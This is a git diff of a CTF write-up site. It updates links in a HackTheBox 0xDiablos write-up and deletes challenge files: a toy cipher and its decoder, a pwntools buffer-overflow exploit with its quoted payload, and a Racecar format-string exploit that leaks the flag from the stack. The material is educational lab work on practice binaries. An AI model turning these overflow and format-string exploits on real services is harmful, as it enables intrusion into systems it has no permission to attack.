diff --git a/content/writeups/HackTheBox/0xDiablos/0xdiablos.md b/content/writeups/HackTheBox/0xDiablos/0xdiablos.md index 74f217ef..ec9e8b9c 100644 --- a/content/writeups/HackTheBox/0xDiablos/0xdiablos.md +++ b/content/writeups/HackTheBox/0xDiablos/0xdiablos.md @@ -8,7 +8,7 @@ categories: First challenge on this platform! -No nmap scan or gobuster...I just had to download the [vuln](/htb/oxdiablos/vuln) script in zip archive with a given password (hackthebox) +No nmap scan or gobuster...I just had to download the [vuln](https://github.com/nair0lf32/CTF-Scripts/blob/master/Hackthebox/oxdiablos/vuln) script in zip archive with a given password (hackthebox) After unzipping and executing it, the program just takes an input and echo it back in the console... @@ -330,7 +330,7 @@ Now the final paylaod is: `python2 -c "print('A'*188 + '\xe2\x91\x04\x08'+'A'*4+'\xef\xbe\xad\xde\r\xd0\xde\xc0')" | ./vuln` -used an [exploit.py](/htb/oxdiablos/exploit.py) script for better comfort and usabilty +used an [exploit.py](https://github.com/nair0lf32/CTF-Scripts/blob/master/Hackthebox/oxdiablos/exploit.py) script for better comfort and usabilty You can also use netcat directly diff --git a/static/htb/babyencryption/chall.py b/static/htb/babyencryption/chall.py deleted file mode 100644 index a9d1ca57..00000000 --- a/static/htb/babyencryption/chall.py +++ /dev/null @@ -1,15 +0,0 @@ -import string -from secret import MSG - -def encryption(msg): - ct = [] - for char in msg: - ct.append((123 * char + 18) % 256) - return bytes(ct) - -ct = encryption(MSG) -f = open('./msg.enc','w') -f.write(ct.hex()) -f.close() - - diff --git a/static/htb/babyencryption/decode.py b/static/htb/babyencryption/decode.py deleted file mode 100644 index 64d58ef5..00000000 --- a/static/htb/babyencryption/decode.py +++ /dev/null @@ -1,25 +0,0 @@ -#!/usr/bin/env python3 -def decrypt(msg): - cd = [] - for char in msg: - char = char - 18 - char = 179 * char % 256 - cd.append(char) - return bytes(cd) - -with open('msg.enc') as f: - ct = bytes.fromhex(f.read()) - cd = decrypt(ct) - print(cd) - - - - - - - - - - - - diff --git a/static/htb/babyencryption/msg.enc b/static/htb/babyencryption/msg.enc deleted file mode 100644 index 014ceef0..00000000 --- a/static/htb/babyencryption/msg.enc +++ /dev/null @@ -1 +0,0 @@ -6e0a9372ec49a3f6930ed8723f9df6f6720ed8d89dc4937222ec7214d89d1e0e352ce0aa6ec82bf622227bb70e7fb7352249b7d893c493d8539dec8fb7935d490e7f9d22ec89b7a322ec8fd80e7f8921 \ No newline at end of file diff --git a/static/htb/oxdiablos/exploit.py b/static/htb/oxdiablos/exploit.py deleted file mode 100644 index cac24844..00000000 --- a/static/htb/oxdiablos/exploit.py +++ /dev/null @@ -1,13 +0,0 @@ -from pwn import * - -flag = 0x080491e2 -deadbeef = 0xdeadbeef -codedood = 0xc0ded00d -host = "138.68.131.63" #to modify -port = 31365 #modify - -payload = b"A"*188 + p32(flag) + b"A"*4 + p32(deadbeef) + p32(codedood) - -p = remote(host,port) -p.sendline(payload) -p.interactive() diff --git a/static/htb/oxdiablos/vuln b/static/htb/oxdiablos/vuln deleted file mode 100644 index 00daa76e..00000000 Binary files a/static/htb/oxdiablos/vuln and /dev/null differ diff --git a/static/htb/racecar/decode.py b/static/htb/racecar/decode.py deleted file mode 100644 index 1f624b4c..00000000 --- a/static/htb/racecar/decode.py +++ /dev/null @@ -1,7 +0,0 @@ -from pwn import * -flag = "0x7b4254480x5f7968770x5f6431640x34735f310x745f33760x665f33680x5f67346c0x745f6e300x355f33680x6b6334740x7d213f" -decoded_flag = [] -for element in flag.split("0x")[1:]: - decoded_flag.append(p32(int("0x" + element,16))) - print (b''.join(decoded_flag)) - diff --git a/static/htb/racecar/exploit.py b/static/htb/racecar/exploit.py deleted file mode 100644 index 1de2e85c..00000000 --- a/static/htb/racecar/exploit.py +++ /dev/null @@ -1,22 +0,0 @@ -from pwn import * -import time -p = remote("138.68.129.154",31614) # remote server -#p = process("./racecar") # local tests -context.log_level = "debug" - -def go_to_end(): - p.sendline("Name") - p.recv() - p.sendline("Nickname") - p.recv() - p.sendline("2") - p.recv() - p.sendline("1") - p.recv() - p.sendline("2") - p.recv() - -go_to_end() -p.sendline("%x%x%x%x%x%x%x%x%x%x%x---FLAG: %p%p%p%p%p%p%p%p%p%p%p ---") -print(p.recv()) -p.interactive() diff --git a/static/htb/racecar/racecar b/static/htb/racecar/racecar deleted file mode 100644 index f4d7f4ca..00000000 Binary files a/static/htb/racecar/racecar and /dev/null differ